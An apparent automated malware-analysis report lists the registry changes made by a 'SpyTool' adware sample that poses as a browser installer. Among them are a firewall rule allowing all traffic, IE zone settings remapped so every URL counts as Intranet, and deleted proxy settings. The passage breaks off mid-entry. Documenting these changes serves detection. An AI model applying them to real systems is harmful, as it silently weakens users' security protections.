"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"https" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"IsInstalled" = "1"
"Version" = "24,0,0,0"
[HKCR\https\shell]
"(Default)" = "open"
[HKCR\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
[HKCR\.xht\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\Startmenu]
"StartMenuInternet" = "MyBrowser"
[HKCU\Software\Classes\http\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKLM\SOFTWARE\RegisteredApplications]
"MyBrowser" = "Software\Clients\StartMenuInternet\MyBrowser\Capabilities"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"webcal" = "CRSBRWSHTML"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerError" = "0"
[HKCR\ftp]
"URL Protocol" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
[HKCR\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\HTTP\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerResult" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe --uninstall --system-level"
[HKCR\https\shell\open\ddeexec]
"(Default)" = ""
[HKCR\CRSBRWSHTML\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"sms" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\mybrowser.exe]
"Path" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C2 8D AF 0F C0 DD 39 8B 3B DB 81 6D C6 39 6E 22"
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerExtraCode1" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Classes\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\HTTP\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\https\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKCR\CRSBRWSHTML\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCR\.shtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKCU\Software\Classes\https\shell]
"(Default)" = "open"
[HKCR\.webp\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoModify" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".htm" = "CRSBRWSHTML"
[HKCR\HTTP]
"URL Protocol" = ""
[HKCU\Software\Classes\http\shell]
"(Default)" = "open"
[HKCR\HTTP\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\MyBrowser\Installer]
"oopcrashes" = "1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mms" = "CRSBRWSHTML"
[HKCU\Software\Classes\http]
"URL Protocol" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ReinstallCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --make-default-browser"
[HKCR\.shtml]
"(Default)" = "CRSBRWSHTML"
[HKCU\Software\Classes\https]
"URL Protocol" = ""
[HKLM\SOFTWARE\MyBrowser\Installer]
"InstallerSuccessLaunchCmdLine" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"
"UninstallString" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe"
[HKCR\.xht]
"(Default)" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"urn" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap" = "-stage:preconditions"
[HKCR\HTTP\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"tel" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"NoRepair" = "1"
[HKCU\Software\Classes\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\https]
"URL Protocol" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xht" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCR\.htm]
"(Default)" = "CRSBRWSHTML"
[HKCR\.htm\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".webp" = "CRSBRWSHTML"
[HKCU\Software\Classes\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Publisher" = "The MyBrowser Authors"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"news" = "CRSBRWSHTML"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"Version" = "39.5.2171.95"
[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"Localized Name" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet]
"(Default)" = "MyBrowser"
[HKCR\CRSBRWSHTML]
"(Default)" = "MyBrowser HTML Document"
[HKLM\SOFTWARE\MyBrowser\Installer]
"pv" = "39.5.2171.95"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayName" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".shtml" = "CRSBRWSHTML"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"ShowIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --show-icons"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"ftp" = "CRSBRWSHTML"
[HKCR\ftp\shell\open\ddeexec]
"(Default)" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Classes\.xhtml]
"(Default)" = "CRSBRWSHTML"
[HKCR\ftp\shell]
"(Default)" = "open"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser]
"(Default)" = "MyBrowser"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"HideIconsCommand" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe --hide-icons"
[HKCR\.xhtml\OpenWithProgids]
"CRSBRWSHTML" = ""
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallLocation" = "%Program Files%\MyBrowser\MyBrowser\Application"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"
[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"ServerExecutable" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"http" = "CRSBRWSHTML"
[HKCU\Software\Clients\StartmenuInternet]
"(Default)" = "MyBrowser"
[HKCU\Software\Classes\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKCU\Software\Classes\http\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"
[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".html" = "CRSBRWSHTML"
Adds a rule to the Windows firewall that allows any network activity for the application:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe:*:Enabled:MyBrowser"
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\MyBrowser\Installer]
"ap"
"InstallerExtraCode1"
The process taskkill.exe:1804 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 F8 C8 72 6A 25 58 C6 C0 8F A1 13 D7 16 61 AA"
The process taskkill.exe:1796 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "30 D2 47 99 A6 BE 5B C6 2A 0F 83 FC 0D 7D D8 6E"
The process taskkill.exe:660 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 B4 A2 3A CD 9C 79 85 F5 4C 7A C2 53 AF 62 AF"
The process nsj32.tmp:1912 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 20 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C6 43 2C 21 8C AA B9 EA 22 03 73 D7 00 54 68 6A"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process amisid.exe:1952 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B1 B4 85 DD 3A 06 FC 76 57 37 D8 DE EC 17 9D BE"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
"EventMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
[HKCU\Software\InternetTurbo]
"UID" = "D6A6947B24975DB6AB9DE8B171C5FA6E"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"
The process amisid.exe:1844 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"
"CategoryCount" = "16"
[HKCU\Software\InternetTurbo]
"UID" = "D6A6947B24975DB6AB9DE8B171C5FA6E"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"
"LogSessionName" = "stdout"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EE 70 41 37 6D B5 5B 0E 16 ED CD 4B 19 D6 0A 8F"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"
[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"TypesSupported" = "7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level" = ""
The SpyTool deletes the following value(s) in system registry:
[HKLM\SOFTWARE\Microsoft\ESENT\Process\amisid\DEBUG]
"Trace Level"
The process tasklist.exe:1852 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5C 86 10 6C E8 E8 1C CB 75 0E AA 8A ED E5 C5 08"
The process tasklist.exe:324 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "C8 62 09 4B 75 71 D3 E6 0C 9A 6F 10 23 5F 83 60"
The process nss12.tmp:1616 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D E8 0D 1D AA C7 C4 9E 43 52 4E 38 8C CA 58 22"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process 9823.exe:320 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Tempo]
"(Default)" = "Tempo"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\3554]
"setup.exe" = "MyBrowser Installer"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\CrossBrowser]
"Installation" = "1"
[HKCU\Software\Crossbrowse]
"Preinstall" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 AE 92 EF 52 90 2A 66 AF CE CF BB 2C DA 49 26"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The SpyTool modifies IE security zone settings so that all local web nodes without dots that are not assigned to any zone are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The SpyTool modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The SpyTool modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The SpyTool deletes the following registry key(s):
[HKLM\SOFTWARE\Tempo]
The SpyTool deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process nsx36.tmp:1468 makes changes in the system registry.
The SpyTool creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 21 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\System\CurrentControlSet\Services\NlaSvc]
"vpolicy" = "iml"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
